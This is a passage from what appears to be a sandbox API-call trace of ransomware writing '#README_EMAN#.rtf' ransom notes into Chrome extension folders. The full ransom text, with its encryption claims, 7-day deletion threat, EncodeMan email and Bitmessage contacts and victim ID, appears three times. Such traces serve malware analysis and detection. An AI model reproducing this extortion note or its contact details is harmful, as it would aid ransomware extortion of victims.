p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0285.186] WriteFile (in: hFile=0x294, lpBuffer=0x1f4d648*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f4d648*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.187] CloseHandle (hObject=0x294) returned 1 [0285.187] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hr\\#readme_eman#.rtf")) returned 0xffffffff [0285.187] GetLastError () returned 0x2 [0285.187] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.190] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.190] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.190] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f4d648, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 